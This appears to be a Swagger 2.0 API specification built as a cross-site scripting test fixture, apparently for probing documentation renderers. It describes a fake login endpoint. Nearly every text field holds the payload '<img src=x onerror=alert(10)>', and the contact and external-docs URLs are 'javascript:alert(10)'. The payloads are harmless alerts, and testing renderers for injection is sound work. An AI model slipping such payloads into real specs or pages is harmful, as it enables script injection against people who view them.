swagger: '2.0'
info:
  version: 1.0.0
  title: <img src=x onerror=alert(10)>
  description: >-
    <img src=x onerror=alert(10)>
    <h1>Fake Login con XSS masivo</h1>
    <img src=x onerror=alert(10)>
  contact:
    name: <img src=x onerror=alert(10)>
    url: javascript:alert(10)
  license:
    name: <img src=x onerror=alert(10)>
host: localhost:8080
basePath: /
schemes:
  - http
  - https
consumes:
  - <img src=x onerror=alert(10)>
produces:
  - <img src=x onerror=alert(10)>

paths:
  /:
    get:
      summary: <img src=x onerror=alert(10)>
      description: <img src=x onerror=alert(10)>
      operationId: getRoot<img src=x onerror=alert(10)>
      parameters:
        - name: dummy
          in: query
          description: <img src=x onerror=alert(10)>
          type: string
      responses:
        '200':
          description: <img src=x onerror=alert(10)>
          schema:
            type: string
            example: <img src=x onerror=alert(10)>

    post:
      summary: <img src=x onerror=alert(10)>
      description: <img src=x onerror=alert(10)>
      consumes:
        - application/x-www-form-urlencoded
        - <img src=x onerror=alert(10)>
      parameters:
        - name: username
          in: formData
          required: true
          type: string
          description: <img src=x onerror=alert(10)>
        - name: password
          in: formData
          required: true
          type: string
          format: password
          description: <img src=x onerror=alert(10)>
        - name: csrf
          in: formData
          type: string
          description: <img src=x onerror=alert(10)>
      responses:
        '200':
          description: <img src=x onerror=alert(10)>
        '400':
          description: <img src=x onerror=alert(10)>
        default:
          description: <img src=x onerror=alert(10)>

  /admin:
    get:
      summary: <img src=x onerror=alert(10)>
      description: <img src=x onerror=alert(10)>
      responses:
        '200':
          description: <img src=x onerror=alert(10)>

  /reflected/{param}:
    get:
      summary: <img src=x onerror=alert(10)>
      parameters:
        - name: param
          in: path
          required: true
          type: string
          description: <img src=x onerror=alert(10)>
      responses:
        '200':
          description: <img src=x onerror=alert(10)>

definitions:
  Error:
    type: object
    properties:
      message:
        type: string
        description: <img src=x onerror=alert(10)>
      code:
        type: integer
        description: <img src=x onerror=alert(10)>

  User:
    type: object
    properties:
      username:
        type: string
        description: <img src=x onerror=alert(10)>
      password:
        type: string
        description: <img src=x onerror=alert(10)>

securityDefinitions:
  api_key:
    type: apiKey
    name: <img src=x onerror=alert(10)>
    in: header
    description: <img src=x onerror=alert(10)>

tags:
  - name: <img src=x onerror=alert(10)>
    description: <img src=x onerror=alert(10)>

externalDocs:
  description: <img src=x onerror=alert(10)>
  url: javascript:alert(10)
